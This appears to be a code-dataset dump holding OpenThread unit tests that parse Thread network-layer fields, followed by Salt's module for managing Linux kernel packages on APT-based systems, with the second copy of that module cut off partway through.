self.assertEqual(mac_extended_address, network_layer.MacExtendedAddress(mac_address))
class TestMacExtendedAddressFactory(unittest.TestCase):
def test_should_create_MacExtendedAddress_from_bytearray_when_parse_method_is_called(self):
# GIVEN
mac_address = any_mac_extended_address()
factory = network_layer.MacExtendedAddressFactory()
# WHEN
mac_extended_address = factory.parse(io.BytesIO(mac_address), common.MessageInfo())
# THEN
self.assertTrue(isinstance(mac_extended_address, network_layer.MacExtendedAddress))
self.assertEqual(mac_address, mac_extended_address.mac_address)
class TestRloc16(unittest.TestCase):
def test_should_return_rloc16_value_when_rloc16_property_is_called(self):
# GIVEN
rloc16 = any_rloc16()
rloc16_obj = network_layer.Rloc16(rloc16)
# WHEN
actual_rloc16 = rloc16_obj.rloc16
# THEN
self.assertEqual(rloc16, actual_rloc16)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
rloc16 = any_rloc16()
rloc16_obj = network_layer.Rloc16(rloc16)
# THEN
self.assertEqual(rloc16_obj, network_layer.Rloc16(rloc16))
class TestRloc16Factory(unittest.TestCase):
def test_should_create_Rloc16_from_bytearray_when_parse_method_is_called(self):
# GIVEN
rloc16 = any_rloc16()
factory = network_layer.Rloc16Factory()
data = bytearray(struct.pack(">H", rloc16))
# WHEN
rloc16_obj = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(rloc16_obj, network_layer.Rloc16))
self.assertEqual(rloc16, rloc16_obj.rloc16)
class TestMlEid(unittest.TestCase):
def test_should_return_ml_eid_value_when_ml_eid_property_is_called(self):
# GIVEN
ml_eid = any_ml_eid()
ml_eid_obj = network_layer.MlEid(ml_eid)
# WHEN
actual_ml_eid = ml_eid_obj.ml_eid
# THEN
self.assertEqual(ml_eid, actual_ml_eid)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
ml_eid = any_ml_eid()
ml_eid_obj = network_layer.MlEid(ml_eid)
# THEN
self.assertEqual(ml_eid_obj, network_layer.MlEid(ml_eid))
class TestMlEidFactory(unittest.TestCase):
def test_should_create_MlEid_from_bytearray_when_parse_method_is_called(self):
# GIVEN
ml_eid = any_ml_eid()
factory = network_layer.MlEidFactory()
# WHEN
ml_eid_obj = factory.parse(io.BytesIO(ml_eid), common.MessageInfo())
# THEN
self.assertTrue(isinstance(ml_eid_obj, network_layer.MlEid))
self.assertEqual(ml_eid, ml_eid_obj.ml_eid)
class TestStatus(unittest.TestCase):
def test_should_return_status_value_when_status_property_is_called(self):
# GIVEN
status = any_status()
status_obj = network_layer.Status(status)
# WHEN
actual_status = status_obj.status
# THEN
self.assertEqual(status, actual_status)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
status = any_status()
status_obj = network_layer.Status(status)
# THEN
self.assertEqual(status_obj, network_layer.Status(status))
class TestStatusFactory(unittest.TestCase):
def test_should_create_Status_from_bytearray_when_parse_method_is_called(self):
# GIVEN
status = any_status()
factory = network_layer.StatusFactory()
data = bytearray([status])
# WHEN
status_obj = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(status_obj, network_layer.Status))
self.assertEqual(status, status_obj.status)
class TestTimeSinceLastTransaction(unittest.TestCase):
def test_should_return_seconds_value_when_seconds_property_is_called(self):
# GIVEN
seconds = any_seconds()
time_since_last_transaction = network_layer.TimeSinceLastTransaction(seconds)
# WHEN
actual_seconds = time_since_last_transaction.seconds
# THEN
self.assertEqual(seconds, actual_seconds)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
seconds = any_seconds()
time_since_last_transaction = network_layer.TimeSinceLastTransaction(seconds)
# THEN
self.assertEqual(
time_since_last_transaction,
network_layer.TimeSinceLastTransaction(seconds),
)
class TestTimeSinceLastTransactionFactory(unittest.TestCase):
def test_should_create_TimeSinceLastTransaction_from_bytearray_when_parse_method_is_called(self):
# GIVEN
seconds = any_seconds()
factory = network_layer.TimeSinceLastTransactionFactory()
data = bytearray(struct.pack(">L", seconds))
# WHEN
time_since_last_transaction = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(
time_since_last_transaction,
network_layer.TimeSinceLastTransaction,
))
self.assertEqual(seconds, time_since_last_transaction.seconds)
class TestRouterMask(unittest.TestCase):
def test_should_return_id_sequence_value_when_id_sequence_property_is_called(self):
# GIVEN
id_sequence = any_id_sequence()
router_mask = network_layer.RouterMask(id_sequence, any_router_id_mask())
# WHEN
actual_id_sequence = router_mask.id_sequence
# THEN
self.assertEqual(id_sequence, actual_id_sequence)
def test_should_return_router_id_mask_value_when_router_id_mask_property_is_called(self):
# GIVEN
router_id_mask = any_router_id_mask()
router_mask = network_layer.RouterMask(any_id_sequence(), router_id_mask)
# WHEN
actual_router_id_mask = router_mask.router_id_mask
# THEN
self.assertEqual(router_id_mask, actual_router_id_mask)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
id_sequence = any_id_sequence()
router_id_mask = any_router_id_mask()
router_mask = network_layer.RouterMask(id_sequence, router_id_mask)
# THEN
self.assertEqual(router_mask, network_layer.RouterMask(id_sequence, router_id_mask))
class TestRouterMaskFactory(unittest.TestCase):
def test_should_create_RouterMask_from_bytearray_when_parse_method_is_called(self):
# GIVEN
id_sequence = any_id_sequence()
router_id_mask = any_router_id_mask()
factory = network_layer.RouterMaskFactory()
data = bytearray([id_sequence]) + struct.pack(">Q", router_id_mask)
# WHEN
router_mask = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(router_mask, network_layer.RouterMask))
self.assertEqual(id_sequence, router_mask.id_sequence)
self.assertEqual(router_id_mask, router_mask.router_id_mask)
class TestNdOption(unittest.TestCase):
def test_should_return_options_value_when_options_property_is_called(self):
# GIVEN
options = any_options()
nd_option = network_layer.NdOption(options)
# WHEN
actual_options = nd_option.options
# THEN
self.assertEqual(options, actual_options)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
options = any_options()
nd_option = network_layer.NdOption(options)
# THEN
self.assertEqual(nd_option, network_layer.NdOption(options))
class TestNdOptionFactory(unittest.TestCase):
def test_should_create_NdOption_from_bytearray_when_parse_method_is_called(self):
# GIVEN
options = any_options()
factory = network_layer.NdOptionFactory()
data = bytearray(options)
# WHEN
nd_option = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(nd_option, network_layer.NdOption))
self.assertEqual(options, nd_option.options)
class TestThreadNetworkData(unittest.TestCase):
    def test_should_return_tlvs_value_when_tlvs_property_is_called(self):
# GIVEN
tlvs = any_tlvs_data()
thread_network_data = network_layer.ThreadNetworkData(tlvs)
# WHEN
actual_tlvs = thread_network_data.tlvs
# THEN
self.assertEqual(tlvs, actual_tlvs)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
tlvs = any_tlvs_data()
thread_network_data = network_layer.ThreadNetworkData(tlvs)
# THEN
self.assertEqual(thread_network_data, network_layer.ThreadNetworkData(tlvs))
class TestThreadNetworkDataFactory(unittest.TestCase):
def test_should_create_ThreadNetworkData_from_bytearray_when_parse_method_is_called(self):
# GIVEN
tlvs = any_tlvs_data()
class DummyNetworkDataTlvsFactory:
def parse(self, data, message_info):
return bytearray(data.read())
factory = network_layer.ThreadNetworkDataFactory(DummyNetworkDataTlvsFactory())
# WHEN
thread_network_data = factory.parse(io.BytesIO(tlvs), common.MessageInfo())
# THEN
self.assertTrue(isinstance(thread_network_data, network_layer.ThreadNetworkData))
self.assertEqual(tlvs, thread_network_data.tlvs)
if __name__ == "__main__":
unittest.main()
| #!/usr/bin/env python3
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import io
import random
import struct
import unittest
import common
import network_layer
def any_eid():
return bytearray([random.getrandbits(8) for _ in range(16)])
def any_mac_extended_address():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_rloc16():
return random.getrandbits(16)
def any_ml_eid():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_status():
return random.getrandbits(1)
def any_seconds():
return random.getrandbits(32)
def any_id_sequence():
return random.getrandbits(8)
def any_router_id_mask():
return random.getrandbits(64)
def any_options(count=None):
count = count if count is not None else random.randint(0, 255)
return [random.getrandbits(8) for _ in range(count)]
def any_tlv_data(length=None):
_type = random.getrandbits(8)
length = length if length is not None else random.getrandbits(8)
value = bytearray([random.getrandbits(8) for _ in range(length)])
return bytearray([_type, length]) + value
def any_tlvs_data(count=None):
count = count if count is not None else random.randint(0, 16)
data = bytearray()
for _ in range(count):
data += any_tlv_data(random.randint(1, 15))
return data
class TestTargetEid(unittest.TestCase):
def test_should_return_eid_value_when_eid_property_is_called(self):
# GIVEN
eid = any_eid()
target_eid = network_layer.TargetEid(eid)
# WHEN
actual_eid = target_eid.eid
# THEN
self.assertEqual(eid, actual_eid)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
eid = any_eid()
target_eid = network_layer.TargetEid(eid)
# THEN
self.assertEqual(target_eid, network_layer.TargetEid(eid))
class TestTargetEidFactory(unittest.TestCase):
def test_should_create_TargetEid_from_bytearray_when_parse_method_is_called(self):
# GIVEN
eid = any_eid()
factory = network_layer.TargetEidFactory()
# WHEN
target_eid = factory.parse(io.BytesIO(eid), common.MessageInfo())
# THEN
self.assertTrue(isinstance(target_eid, network_layer.TargetEid))
self.assertEqual(eid, target_eid.eid)
class TestMacExtendedAddress(unittest.TestCase):
def test_should_return_mac_address_value_when_mac_address_property_is_called(self):
# GIVEN
mac_address = any_mac_extended_address()
mac_extended_address = network_layer.MacExtendedAddress(mac_address)
# WHEN
actual_mac_address = mac_extended_address.mac_address
# THEN
self.assertEqual(mac_address, actual_mac_address)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
mac_address = any_mac_extended_address()
mac_extended_address = network_layer.MacExtendedAddress(mac_address)
# THEN
self.assertEqual(mac_extended_address, network_layer.MacExtendedAddress(mac_address))
class TestMacExtendedAddressFactory(unittest.TestCase):
def test_should_create_MacExtendedAddress_from_bytearray_when_parse_method_is_called(self):
# GIVEN
mac_address = any_mac_extended_address()
factory = network_layer.MacExtendedAddressFactory()
# WHEN
mac_extended_address = factory.parse(io.BytesIO(mac_address), common.MessageInfo())
# THEN
self.assertTrue(isinstance(mac_extended_address, network_layer.MacExtendedAddress))
self.assertEqual(mac_address, mac_extended_address.mac_address)
class TestRloc16(unittest.TestCase):
def test_should_return_rloc16_value_when_rloc16_property_is_called(self):
# GIVEN
rloc16 = any_rloc16()
rloc16_obj = network_layer.Rloc16(rloc16)
# WHEN
actual_rloc16 = rloc16_obj.rloc16
# THEN
self.assertEqual(rloc16, actual_rloc16)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
rloc16 = any_rloc16()
rloc16_obj = network_layer.Rloc16(rloc16)
# THEN
self.assertEqual(rloc16_obj, network_layer.Rloc16(rloc16))
class TestRloc16Factory(unittest.TestCase):
def test_should_create_Rloc16_from_bytearray_when_parse_method_is_called(self):
# GIVEN
rloc16 = any_rloc16()
factory = network_layer.Rloc16Factory()
data = bytearray(struct.pack(">H", rloc16))
# WHEN
rloc16_obj = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(rloc16_obj, network_layer.Rloc16))
self.assertEqual(rloc16, rloc16_obj.rloc16)
class TestMlEid(unittest.TestCase):
def test_should_return_ml_eid_value_when_ml_eid_property_is_called(self):
# GIVEN
ml_eid = any_ml_eid()
ml_eid_obj = network_layer.MlEid(ml_eid)
# WHEN
actual_ml_eid = ml_eid_obj.ml_eid
# THEN
self.assertEqual(ml_eid, actual_ml_eid)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
ml_eid = any_ml_eid()
ml_eid_obj = network_layer.MlEid(ml_eid)
# THEN
self.assertEqual(ml_eid_obj, network_layer.MlEid(ml_eid))
class TestMlEidFactory(unittest.TestCase):
def test_should_create_MlEid_from_bytearray_when_parse_method_is_called(self):
# GIVEN
ml_eid = any_ml_eid()
factory = network_layer.MlEidFactory()
# WHEN
ml_eid_obj = factory.parse(io.BytesIO(ml_eid), common.MessageInfo())
# THEN
self.assertTrue(isinstance(ml_eid_obj, network_layer.MlEid))
self.assertEqual(ml_eid, ml_eid_obj.ml_eid)
class TestStatus(unittest.TestCase):
def test_should_return_status_value_when_status_property_is_called(self):
# GIVEN
status = any_status()
status_obj = network_layer.Status(status)
# WHEN
actual_status = status_obj.status
# THEN
self.assertEqual(status, actual_status)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
status = any_status()
status_obj = network_layer.Status(status)
# THEN
self.assertEqual(status_obj, network_layer.Status(status))
class TestStatusFactory(unittest.TestCase):
def test_should_create_Status_from_bytearray_when_parse_method_is_called(self):
# GIVEN
status = any_status()
factory = network_layer.StatusFactory()
data = bytearray([status])
# WHEN
status_obj = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(status_obj, network_layer.Status))
self.assertEqual(status, status_obj.status)
class TestTimeSinceLastTransaction(unittest.TestCase):
def test_should_return_seconds_value_when_seconds_property_is_called(self):
# GIVEN
seconds = any_seconds()
time_since_last_transaction = network_layer.TimeSinceLastTransaction(seconds)
# WHEN
actual_seconds = time_since_last_transaction.seconds
# THEN
self.assertEqual(seconds, actual_seconds)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
seconds = any_seconds()
time_since_last_transaction = network_layer.TimeSinceLastTransaction(seconds)
# THEN
self.assertEqual(
time_since_last_transaction,
network_layer.TimeSinceLastTransaction(seconds),
)
class TestTimeSinceLastTransactionFactory(unittest.TestCase):
def test_should_create_TimeSinceLastTransaction_from_bytearray_when_parse_method_is_called(self):
# GIVEN
seconds = any_seconds()
factory = network_layer.TimeSinceLastTransactionFactory()
data = bytearray(struct.pack(">L", seconds))
# WHEN
time_since_last_transaction = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(
time_since_last_transaction,
network_layer.TimeSinceLastTransaction,
))
self.assertEqual(seconds, time_since_last_transaction.seconds)
class TestRouterMask(unittest.TestCase):
def test_should_return_id_sequence_value_when_id_sequence_property_is_called(self):
# GIVEN
id_sequence = any_id_sequence()
router_mask = network_layer.RouterMask(id_sequence, any_router_id_mask())
# WHEN
actual_id_sequence = router_mask.id_sequence
# THEN
self.assertEqual(id_sequence, actual_id_sequence)
def test_should_return_router_id_mask_value_when_router_id_mask_property_is_called(self):
# GIVEN
router_id_mask = any_router_id_mask()
router_mask = network_layer.RouterMask(any_id_sequence(), router_id_mask)
# WHEN
actual_router_id_mask = router_mask.router_id_mask
# THEN
self.assertEqual(router_id_mask, actual_router_id_mask)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
id_sequence = any_id_sequence()
router_id_mask = any_router_id_mask()
router_mask = network_layer.RouterMask(id_sequence, router_id_mask)
# THEN
self.assertEqual(router_mask, network_layer.RouterMask(id_sequence, router_id_mask))
class TestRouterMaskFactory(unittest.TestCase):
def test_should_create_RouterMask_from_bytearray_when_parse_method_is_called(self):
# GIVEN
id_sequence = any_id_sequence()
router_id_mask = any_router_id_mask()
factory = network_layer.RouterMaskFactory()
data = bytearray([id_sequence]) + struct.pack(">Q", router_id_mask)
# WHEN
router_mask = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(router_mask, network_layer.RouterMask))
self.assertEqual(id_sequence, router_mask.id_sequence)
self.assertEqual(router_id_mask, router_mask.router_id_mask)
class TestNdOption(unittest.TestCase):
def test_should_return_options_value_when_options_property_is_called(self):
# GIVEN
options = any_options()
nd_option = network_layer.NdOption(options)
# WHEN
actual_options = nd_option.options
# THEN
self.assertEqual(options, actual_options)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
options = any_options()
nd_option = network_layer.NdOption(options)
# THEN
self.assertEqual(nd_option, network_layer.NdOption(options))
class TestNdOptionFactory(unittest.TestCase):
def test_should_create_NdOption_from_bytearray_when_parse_method_is_called(self):
# GIVEN
options = any_options()
factory = network_layer.NdOptionFactory()
data = bytearray(options)
# WHEN
nd_option = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(nd_option, network_layer.NdOption))
self.assertEqual(options, nd_option.options)
class TestThreadNetworkData(unittest.TestCase):
    def test_should_return_tlvs_value_when_tlvs_property_is_called(self):
# GIVEN
tlvs = any_tlvs_data()
thread_network_data = network_layer.ThreadNetworkData(tlvs)
# WHEN
actual_tlvs = thread_network_data.tlvs
# THEN
self.assertEqual(tlvs, actual_tlvs)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
tlvs = any_tlvs_data()
thread_network_data = network_layer.ThreadNetworkData(tlvs)
# THEN
self.assertEqual(thread_network_data, network_layer.ThreadNetworkData(tlvs))
class TestThreadNetworkDataFactory(unittest.TestCase):
def test_should_create_ThreadNetworkData_from_bytearray_when_parse_method_is_called(self):
# GIVEN
tlvs = any_tlvs_data()
class DummyNetworkDataTlvsFactory:
def parse(self, data, message_info):
return bytearray(data.read())
factory = network_layer.ThreadNetworkDataFactory(DummyNetworkDataTlvsFactory())
# WHEN
thread_network_data = factory.parse(io.BytesIO(tlvs), common.MessageInfo())
# THEN
self.assertTrue(isinstance(thread_network_data, network_layer.ThreadNetworkData))
self.assertEqual(tlvs, thread_network_data.tlvs)
if __name__ == "__main__":
unittest.main() | en | 0.697065 | #!/usr/bin/env python3 # # Copyright (c) 2016, The OpenThread Authors. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of the copyright holder nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN | 1.506472 | 2 |
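Each test class above follows the same GIVEN/WHEN/THEN shape: build a value object from a random fixture, check its property accessor and equality, then feed packed bytes through the matching factory's parse() via io.BytesIO. The stand-alone sketch below distills that pattern with an invented two-byte value class; the names and layout are illustrative stand-ins, not part of the OpenThread sources.
import io
import struct
import unittest

class UintValue:
    """Minimal stand-in for a network_layer value class (illustrative only)."""
    def __init__(self, value):
        self._value = value
    @property
    def value(self):
        return self._value
    def __eq__(self, other):
        return isinstance(other, UintValue) and self._value == other._value

class UintValueFactory:
    """Parses a big-endian uint16 from a stream, mirroring the factories above."""
    def parse(self, data, message_info=None):
        return UintValue(struct.unpack(">H", data.read(2))[0])

class TestUintValuePattern(unittest.TestCase):
    def test_parse_round_trip(self):
        # GIVEN
        value = 0x1234
        data = bytearray(struct.pack(">H", value))
        # WHEN
        obj = UintValueFactory().parse(io.BytesIO(data), None)
        # THEN
        self.assertEqual(UintValue(value), obj)

if __name__ == "__main__":
    unittest.main()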
salt/modules/kernelpkg_linux_apt.py | markgras/salt | 9425 | 8077 | <filename>salt/modules/kernelpkg_linux_apt.py
"""
Manage Linux kernel packages on APT-based systems
"""
import functools
import logging
import re
try:
from salt.utils.versions import LooseVersion as _LooseVersion
from salt.exceptions import CommandExecutionError
HAS_REQUIRED_LIBS = True
except ImportError:
HAS_REQUIRED_LIBS = False
log = logging.getLogger(__name__)
__virtualname__ = "kernelpkg"
def __virtual__():
"""
Load this module on Debian-based systems only
"""
if not HAS_REQUIRED_LIBS:
return (False, "Required library could not be imported")
if __grains__.get("os_family", "") in ("Kali", "Debian"):
return __virtualname__
elif __grains__.get("os_family", "") == "Cumulus":
return __virtualname__
return (False, "Module kernelpkg_linux_apt: no APT based system detected")
def active():
"""
Return the version of the running kernel.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.active
"""
if "pkg.normalize_name" in __salt__:
return __salt__["pkg.normalize_name"](__grains__["kernelrelease"])
return __grains__["kernelrelease"]
def list_installed():
"""
Return a list of all installed kernels.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.list_installed
"""
pkg_re = re.compile(r"^{}-[\d.-]+-{}$".format(_package_prefix(), _kernel_type()))
pkgs = __salt__["pkg.list_pkgs"](versions_as_list=True)
if pkgs is None:
pkgs = []
result = list(filter(pkg_re.match, pkgs))
if result is None:
return []
prefix_len = len(_package_prefix()) + 1
return sorted(
[pkg[prefix_len:] for pkg in result], key=functools.cmp_to_key(_cmp_version)
)
def latest_available():
"""
Return the version of the latest kernel from the package repositories.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.latest_available
"""
result = __salt__["pkg.latest_version"](
"{}-{}".format(_package_prefix(), _kernel_type())
)
if result == "":
return latest_installed()
version = re.match(r"^(\d+\.\d+\.\d+)\.(\d+)", result)
return "{}-{}-{}".format(version.group(1), version.group(2), _kernel_type())
def latest_installed():
"""
Return the version of the latest installed kernel.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.latest_installed
.. note::
This function may not return the same value as
:py:func:`~salt.modules.kernelpkg_linux_apt.active` if a new kernel
has been installed and the system has not yet been rebooted.
The :py:func:`~salt.modules.kernelpkg_linux_apt.needs_reboot` function
exists to detect this condition.
"""
pkgs = list_installed()
if pkgs:
return pkgs[-1]
return None
def needs_reboot():
"""
Detect if a new kernel version has been installed but is not running.
Returns True if a new kernel is installed, False otherwise.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.needs_reboot
"""
return _LooseVersion(active()) < _LooseVersion(latest_installed())
def upgrade(reboot=False, at_time=None):
"""
Upgrade the kernel and optionally reboot the system.
reboot : False
Request a reboot if a new kernel is available.
at_time : immediate
Schedule the reboot at some point in the future. This argument
is ignored if ``reboot=False``. See
:py:func:`~salt.modules.system.reboot` for more details
on this argument.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.upgrade
salt '*' kernelpkg.upgrade reboot=True at_time=1
.. note::
An immediate reboot often shuts down the system before the minion has a
chance to return, resulting in errors. A minimal delay (1 minute) is
useful to ensure the result is delivered to the master.
"""
result = __salt__["pkg.install"](
name="{}-{}".format(_package_prefix(), latest_available())
)
_needs_reboot = needs_reboot()
ret = {
"upgrades": result,
"active": active(),
"latest_installed": latest_installed(),
"reboot_requested": reboot,
"reboot_required": _needs_reboot,
}
if reboot and _needs_reboot:
log.warning("Rebooting system due to kernel upgrade")
__salt__["system.reboot"](at_time=at_time)
return ret
def upgrade_available():
"""
Detect if a new kernel version is available in the repositories.
Returns True if a new kernel is available, False otherwise.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.upgrade_available
"""
return _LooseVersion(latest_available()) > _LooseVersion(latest_installed())
def remove(release):
"""
Remove a specific version of the kernel.
release
The release number of an installed kernel. This must be the entire release
number as returned by :py:func:`~salt.modules.kernelpkg_linux_apt.list_installed`,
not the package name.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.remove 4.4.0-70-generic
"""
if release not in list_installed():
raise CommandExecutionError(
"Kernel release '{}' is not installed".format(release)
)
if release == active():
raise CommandExecutionError("Active kernel cannot be removed")
target = "{}-{}".format(_package_prefix(), release)
log.info("Removing kernel package %s", target)
__salt__["pkg.purge"](target)
return {"removed": [target]}
def cleanup(keep_latest=True):
"""
Remove all unused kernel packages from the system.
keep_latest : True
In the event that the active kernel is not the latest one installed, setting this to True
will retain the latest kernel package, in addition to the active one. If False, all kernel
packages other than the active one will be removed.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.cleanup
"""
removed = []
# Loop over all installed kernel packages
for kernel in list_installed():
# Keep the active kernel package
if kernel == active():
continue
# Optionally keep the latest kernel package
if keep_latest and kernel == latest_installed():
continue
# Remove the kernel package
removed.extend(remove(kernel)["removed"])
return {"removed": removed}
def _package_prefix():
"""
Return static string for the package prefix
"""
return "linux-image"
def _kernel_type():
"""
Parse the kernel name and return its type
"""
return re.match(r"^[\d.-]+-(.+)$", active()).group(1)
def _cmp_version(item1, item2):
"""
Compare function for package version sorting
"""
vers1 = _LooseVersion(item1)
vers2 = _LooseVersion(item2)
if vers1 < vers2:
return -1
if vers1 > vers2:
return 1
return 0
| <filename>salt/modules/kernelpkg_linux_apt.py
"""
Manage Linux kernel packages on APT-based systems
"""
import functools
import logging
import re
try:
from salt.utils.versions import LooseVersion as _LooseVersion
from salt.exceptions import CommandExecutionError
HAS_REQUIRED_LIBS = True
except ImportError:
HAS_REQUIRED_LIBS = False
log = logging.getLogger(__name__)
__virtualname__ = "kernelpkg"
def __virtual__():
"""
Load this module on Debian-based systems only
"""
if not HAS_REQUIRED_LIBS:
return (False, "Required library could not be imported")
if __grains__.get("os_family", "") in ("Kali", "Debian"):
return __virtualname__
elif __grains__.get("os_family", "") == "Cumulus":
return __virtualname__
return (False, "Module kernelpkg_linux_apt: no APT based system detected")
def active():
"""
Return the version of the running kernel.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.active
"""
if "pkg.normalize_name" in __salt__:
return __salt__["pkg.normalize_name"](__grains__["kernelrelease"])
return __grains__["kernelrelease"]
def list_installed():
"""
Return a list of all installed kernels.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.list_installed
"""
pkg_re = re.compile(r"^{}-[\d.-]+-{}$".format(_package_prefix(), _kernel_type()))
pkgs = __salt__["pkg.list_pkgs"](versions_as_list=True)
if pkgs is None:
pkgs = []
result = list(filter(pkg_re.match, pkgs))
if result is None:
return []
prefix_len = len(_package_prefix()) + 1
return sorted(
[pkg[prefix_len:] for pkg in result], key=functools.cmp_to_key(_cmp_version)
)
def latest_available():
"""
Return the version of the latest kernel from the package repositories.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.latest_available
"""
result = __salt__["pkg.latest_version"](
"{}-{}".format(_package_prefix(), _kernel_type())
)
if result == "":
return latest_installed()
version = re.match(r"^(\d+\.\d+\.\d+)\.(\d+)", result)
return "{}-{}-{}".format(version.group(1), version.group(2), _kernel_type())
def latest_installed():
"""
Return the version of the latest installed kernel.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.latest_installed
.. note::
This function may not return the same value as
:py:func:`~salt.modules.kernelpkg_linux_apt.active` if a new kernel
